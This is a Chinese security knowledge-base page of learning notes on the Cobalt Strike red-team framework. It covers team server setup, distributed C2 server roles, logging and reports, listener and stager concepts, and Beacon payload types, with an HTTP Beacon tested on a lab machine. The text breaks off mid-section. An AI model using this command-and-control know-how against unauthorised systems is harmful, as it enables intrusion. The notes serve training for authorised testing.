<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>Cobalt Strike | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/65.7a2ccc50.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>工具手册</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/tools/nmap.html" title="nmap端口扫描" class="sidebar-link">nmap端口扫描</a></li><li><a href="/knowledge/tools/sqlmap.html" title="sqlmap简要手册" class="sidebar-link">sqlmap简要手册</a></li><li><a href="/knowledge/tools/metasploit.html" title="Metasploit漏洞利用框架" class="sidebar-link">Metasploit漏洞利用框架</a></li><li><a href="/knowledge/tools/burpsuite.html" title="BurpSuite简要手册" class="sidebar-link">BurpSuite简要手册</a></li><li><a href="/knowledge/intranet/Cobalt-Strike.html" aria-current="page" title="Cobalt Strike" class="active sidebar-link">Cobalt Strike</a></li><li><a href="/knowledge/intranet/Aggressor-script.html" title="Aggressor-Script" class="sidebar-link">Aggressor-Script</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>攻防对抗</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h1 id="cobalt-strike">Cobalt Strike <a href="#cobalt-strike" class="header-anchor">#</a></h1> <h1 id="_0x01-基础操作">0x01 基础操作 <a href="#_0x01-基础操作" class="header-anchor">#</a></h1> <h2 id="_1、介绍">1、介绍 <a href="#_1、介绍" class="header-anchor">#</a></h2> <p><strong>CS是什么？</strong></p> <p>Cobalt Strike是一款渗透测试神器，常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。</p> <p>Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成，包括站点克隆获取浏览器的相关信息等。</p> <p>早期版本Cobalt Srtike依赖Metasploit框架，而现在Cobalt Strike已经不再使用MSF而是作为单独的平台使用。</p> <p>这个工具的社区版是大家熟知的Armitage(一个MSF的图形化界面工具)，而Cobalt Strike大家可以理解其为Armitage的商业版。</p> <p><strong>CS的发展</strong></p> <ul><li><p>Armitage [2010-2012]</p> <p>Armitage是一个红队协作攻击管理工具，它以图形化方式实现了Metasploit框架的自动化攻击。Armitage采用Java构建，拥有跨平台特性。</p></li> <li><p>Cobalt Strike 1.x [2012-2014]</p> <p>Cobalt Strike 增强了Metasploit Framework在执行目标攻击和渗透攻击的能力。</p></li> <li><p>Cobalt Strike 2.x [2014-?]</p> <p>Cobalt Strike 2是应模拟黑客攻击的市场需求而出现的，Cobalt Strike 2是以malleable C2技术的需求为定位的，这个技术使Cobalt Strike的能力更强了一些。</p></li> <li><p>Cobalt Strike 3.x [2015-?]</p> <p>Cobalt Strike 3 的攻击和防御都不用在Metasploit Framework平台（界面）下进行。</p> <p>如今 Cobalt Strike 4.0 也已经发布，改动相比 3.x 还是不小的，笔者在演示的时候使用的 Cobalt Strike 4.0，看的视频教程是 3.x 的教程。</p></li></ul> <p><strong>接下来会用到的工具和环境</strong></p> <ul><li>Cobalt Strike</li> <li>Kali</li> <li>Metasploit Framework</li> <li>PowerSploit</li> <li>PowerTools</li> <li>Veil Evasion Framework</li></ul> <h2 id="_2、客户端与服务端的连接">2、客户端与服务端的连接 <a href="#_2、客户端与服务端的连接" class="header-anchor">#</a></h2> <p>Cobalt Strike使用C/S架构，Cobalt Strike的客户端连接到团队服务器，团队服务器连接到目标，也就是说Cobalt Strike的客户端不与目标服务器进行交互，那么Cobalt Strike的客户端如何连接到团队服务器就是本文所学习的东西。</p> <p><strong>准备工作</strong></p> <p>Cobalt Strike的客户端想连接到团队服务器需要知道三个信息：</p> <ul><li>团队服务器的外部IP地址</li> <li>团队服务器的连接密码</li> <li>（此项可选）决定Malleable C2工具的哪一个用户配置文件被用于团队服务器</li></ul> <p>知道这些信息后，就可以使用脚本开启团队服务器了，值得注意的是Cobalt Strike团队服务器只能运行在Linux环境下。</p> <p><strong>开启团队服务器</strong></p> <p>开启团队服务器命令一般如下所示：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>./teamserver your_ip your_passowrd [config_file]
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-1.png" alt=""></p> <p>服务端开启后，就可以开启客户端进行连接了</p> <p><strong>连接到团队服务器</strong></p> <p>在Linux下，直接运行start.sh脚本文件，输入团队服务器的IP、密码和自己的用户名进行连接</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-2.png" alt=""></p> <p>点击Connect连接后，会有个提示信息，如果承认提示信息中的哈希值就是所要连接团队服务器的哈希值就点击Yes，随后即可打开CS客户端界面</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-3.png" alt=""></p> <p>在Windows下的连接方法也基本一致，直接双击start.bat文件，输入IP、密码、用户名，点击Connect即可</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-4.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-5.png" alt=""></p> <p>在连接后，团队之间就可以通过客户端进行沟通，信息共享</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-6.png" alt=""></p> <p>Cobalt Strike不是用来设计指导在一个团队服务器下进行工作的，而是被设计成在一次行动中使用多个团队服务器。</p> <p>这样设计的目的主要在于运行安全，如果一个团队服务器停止运行了，也不会导致整个行动的失败，所以接下来看看如何连接到多个团队服务器。</p> <p><strong>连接到多个团队服务器</strong></p> <p>Cobalt Strike连接到多个团队服务器也很简单，直接点击左上角的加号，输入其他团队服务器的信息后，即可连接</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs2-7.png" alt=""></p> <h2 id="_3、分布式操作">3、分布式操作 <a href="#_3、分布式操作" class="header-anchor">#</a></h2> <p><strong>最基本的团队服务模型</strong></p> <p>这里介绍最基本的团队服务模型，具体由三个服务器构成，具体如下所示：</p> <ul><li><p>临时服务器（Staging Servers）</p> <p>临时服务器介于持久服务器和后渗透服务器之间，它的作用主要是方便在短时间内对目标系统进行访问。</p> <p>它也是最开始用于传递payload、获取初始权限的服务器，它承担初始的权限提升和下载持久性程序的功能，因此这个服务器有较高暴露风险。</p></li> <li><p>持久服务器（Long Haul Servers）</p> <p>持久服务器的作用是保持对目标网络的长期访问，所以持久服务器会以较低的频率与目标保持通信。</p></li> <li><p>后渗透服务器（Post-Exploitation Servers）</p> <p>主要进行后渗透及横向移动的相关任务，比如对目标进行交互式访问</p></li></ul> <p><strong>可伸缩红队操作模型</strong></p> <p>可伸缩红队操作模型（Scaling Red Operations）分为两个层次，第一层次是针对一个目标网络的目标单元；第二层次是针对多个目标网络的权限管理单元。</p> <p>目标单元的工作：</p> <ul><li>负责具体目标或行动的对象</li> <li>获得访问权限、后渗透、横向移动</li> <li>维护本地基础设施</li></ul> <p>访问管理单元的工作：</p> <ul><li>保持所有目标网络的访问权限</li> <li>获取访问权限并接收来自单元的访问</li> <li>根据需要传递对目标单元的访问</li> <li>为持续回调保持全局基础环境</li></ul> <p><strong>团队角色</strong></p> <ul><li><p>开始渗透人员</p> <p>主要任务是进入目标系统，并扩大立足点</p></li> <li><p>后渗透人员</p> <p>主要任务是对目标系统进行数据挖掘、对用户进行监控，收集目标系统的密钥、日志等敏感信息</p></li> <li><p>本地通道管理人员</p> <p>主要任务有建立基础设施、保持shell的持久性、管理回调、传递全局访问管理单元之间的会话</p></li></ul> <h2 id="_4、日志与报告">4、日志与报告 <a href="#_4、日志与报告" class="header-anchor">#</a></h2> <p><strong>日志记录</strong></p> <p>Cobalt Strike的日志文件在团队服务器下的运行目录中的<code>logs</code>文件夹内，其中有些日志文件名例如<code>beacon_11309.log</code>，这里的<code>11309</code>就是beacon会话的ID。</p> <p>按键的日志在<code>keystrokes</code>文件夹内，截屏的日志在<code>screenshots</code>文件夹内，截屏的日志名称一般如<code>screen_015321_4826.jpg</code>类似，其中<code>015321</code>表示时间（1点53分21秒），<code>4826</code>表示ID</p> <p><strong>导出报告</strong></p> <p>Cobalt Strike生成报告的目的在于培训或帮助蓝队，在<code>Reporting</code>菜单栏中就可以生成报告，关于生成的报告有以下特点：</p> <ul><li>输出格式为PDF或者Word格式</li> <li>可以输出自定义报告并且更改图标（Cobalt Strike --&gt; Preferences --&gt;Reporting）</li> <li>可以合并多个团队服务器的报告，并可以对不同报告里的时间进行校正</li></ul> <p><strong>报告类型</strong></p> <ul><li>活动报告（Activity Report）
此报告中提供了红队活动的时间表，记录了每个后渗透活动。</li> <li>主机报告（Hosts Report）
此报告中汇总了Cobalt Strike收集的主机信息，凭据、服务和会话也会在此报告中。</li> <li>侵害指标报告（Indicators of Compromise）
此报告中包括对C2拓展文件的分析、使用的域名及上传文件的MD5哈希。</li> <li>会话报告（Sessions Report）
此报告中记录了指标和活动，包括每个会话回连到自己的通信路径、后渗透活动的时间线等。</li> <li>社工报告（Social Engineering Report）
此报告中记录了每一轮网络钓鱼的电子邮件、谁点击以及从每个点击用户那里收集的信息。该报告还显示了Cobalt Strike的System profiler发现的应用程序。</li> <li>战术、技巧和程序报告（Tactics,Techniques,and Procedures）
此报告将自己的Cobalt Strike行动映射到MITRE的ATT&amp;CK矩阵中的战术，具体可参考<a href="https://attack.mitre.org/" target="_blank" rel="noopener noreferrer">https://attack.mitre.org/<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></li></ul> <h1 id="_0x02-基础设施">0x02 基础设施 <a href="#_0x02-基础设施" class="header-anchor">#</a></h1> <p>这一小节学起来感觉有些吃力，里面很多概念理解的不是很清楚，如果有大佬看到描述错误的地方欢迎留言指正，避免误导他人。</p> <p>再次声明，这只是我的个人学习笔记，就不要当成教程去看了，建议想学习CS的小伙伴可以看看A-TEAM的中文手册或者网上的一些视频教程。</p> <h2 id="_1、监听器管理">1、监听器管理 <a href="#_1、监听器管理" class="header-anchor">#</a></h2> <ul><li><p>什么是监听器</p> <p>顾名思义，监听器就是等待被入侵系统连接自己的一个服务。</p></li> <li><p>监听器的作用</p> <p>主要是为了接受payload回传的各类数据，类似于MSF中handler的作用。</p> <p>比如payload在目标机器执行以后，就会回连到监听器然后下载执行真正的shellcode代码。</p></li></ul> <p>一旦监听器建立起来，团队成员只需要知道这个监听器的名称即可，不用关心监听器背后的基础环境，接下来将深入了解如何准确配置监听器。</p> <p>一个监听器由用户定义的名称、payload 类型和几个特定于 payload 的选项组成。</p> <p>监听器的名字一般由以下结构组成：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>Operating System/Payload/Stager
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>例如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_http/reverse_http
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>什么是传输器</strong></p> <p>攻击载荷<code>payload</code>就是攻击执行的内容。攻击载荷通常被分为两部分：传输器<code>stager</code> 和传输体<code>stage</code>。</p> <p>传输器<code>stager</code>是一个小程序，用于连接、下载传输体<code>stage</code>，并插入到内存中。</p> <p>我个人理解为：攻击载荷里真正用于攻击的代码是在传输体里。</p> <p>所以为什么要有传输体？直接把攻击载荷插入到内存中不更方便快捷、更香么，搞得又是传输器又是传输体的。</p> <p>需要传输体是因为在很多攻击中对于能加载进内存，并在成功漏洞利用后执行的数据大小存在严格限制。这就导致在攻击成功时，很难嵌入额外的攻击载荷，正是因为这些限制，才使得传输器变得有必要了。</p> <p><strong>创建监听器</strong></p> <p>在CS客户端中打开 Cobalt Strike —》Listeners，之后点击Add，此时弹出New Listener窗口，在填写监听器的相关信息之前，需要先来了解监听器有哪些类型。</p> <p>Cobalt Strike有两种类型的监听器：</p> <ul><li><p>Beacon</p> <p>Beacon直译过来就是灯塔、信标、照亮指引的意思，Beacon是较为隐蔽的后渗透代理，笔者个人理解Beacon类型的监听器应该是平时比较常用的。Beacon监听器的名称例如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_http/reverse_http
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li> <li><p>Foreign</p> <p>Foreign直译就是外部的，这里可以理解成<code>对外监听器</code>，这种类型的监听器主要作用是给其他的Payload提供别名，比如Metasploit 框架里的Payload，笔者个人理解Foreign监听器在一定程度上提高了CS的兼容性。对外监听器的名称例如：</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/foreign/reverse_https
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li></ul> <h2 id="_2、http-和-https-beacon">2、HTTP 和 HTTPS Beacon <a href="#_2、http-和-https-beacon" class="header-anchor">#</a></h2> <p><strong>Beacon是什么</strong></p> <ul><li>Beacon是CS的Payload</li> <li>Beacon有两种通信模式。一种是异步通信模式，这种模式通信效率缓慢，Beacon回连团队服务器、下载任务、然后休眠；另一种是交互式通信模式，这种模式的通信是实时发生的。</li> <li>通过HTTP、HTTPS和DNS出口网络</li> <li>使用SMB协议的时候是点对点通信</li> <li>Beacon有很多的后渗透攻击模块和远程管理工具</li></ul> <p><strong>Beacon的类型</strong></p> <ul><li><p>HTTP 和 HTTPS Beacon</p> <p>HTTP和HTTPS Beacon也可以叫做Web Beacon。默认设置情况下，HTTP 和 HTTPS Beacon 通过 HTTP GET 请求来下载任务。这些 Beacon 通过 HTTP POST 请求传回数据。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_http/reverse_http
windows/beacon_https/reverse_https
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div></li> <li><p>DNS Beacon</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_dns/reverse_dns_txt
windows/beacon_dns/reverse_http
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div></li> <li><p>SMB Beacon</p> <p>SMB Beacon也可以叫做pipe beacon</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>windows/beacon_smb/bind_pipe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div></li></ul> <p><strong>创建一个HTTP Beacon</strong></p> <p>点击 Cobalt Strike  --&gt; Listeners 打开监听器管理窗口，点击Add，输入监听器的名称、监听主机地址，因为这里是要创建一个HTTP Beacon，所以其他的默认就行，最后点击Save</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-1.png" alt=""></p> <p>此时可以测试一下刚才设置的监听器，点击Attack --&gt; Web Drive-by --&gt; Scripted Web Delivery(s) ，在弹出的窗口中选择刚才新添的Listener，因为我的靶机是64位的，所以我把Use x64 payload也给勾选上了，最后点击Launch</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-2.png" alt=""></p> <p>复制弹窗的命令，放到靶机中运行</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-3.png" alt=""></p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-4.png" alt=""></p> <p>此时，回到CS，就可以看到已经靶机上线了</p> <p><img src="https://teamssix.oss-cn-hangzhou.aliyuncs.com/cs5-5.png" alt=""></p> <p><strong>HTTPS Beacon</strong></p> <p>HTTPS Beaocn和HTTP Beacon一样，使用了相同的Malleable 